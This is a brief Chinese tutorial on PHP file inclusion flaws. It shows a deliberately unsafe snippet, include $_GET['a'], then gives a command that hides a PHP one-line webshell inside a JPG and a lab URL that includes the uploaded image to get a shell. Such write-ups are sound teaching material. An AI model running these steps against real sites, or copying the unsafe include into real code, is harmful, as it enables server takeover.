0x00 何为文件包含漏洞
开发人员如果在写类似include "a.php"
的代码时,如果将a.php写成了可变的值,那么就可以在上面做文章,举个理想的例子:
<? include $_GET['a'] ?>
此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了。
一个更具体的例子:
在访问一个页面时:
此图表明可以传入文件名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示文件内容,此即为文件包含成功。
0x01 结合文件上传getshell
-
制作嵌有一句话木马的jpg文件:
copy a.jpg/b+b.php c.jpg
记事本打开图片:
发现php代码已被嵌入,此时上传文件,然后进行文件包含:
http://192.168.125.131/cs/main.php?page=uploads/c.jpg
最后成功getshell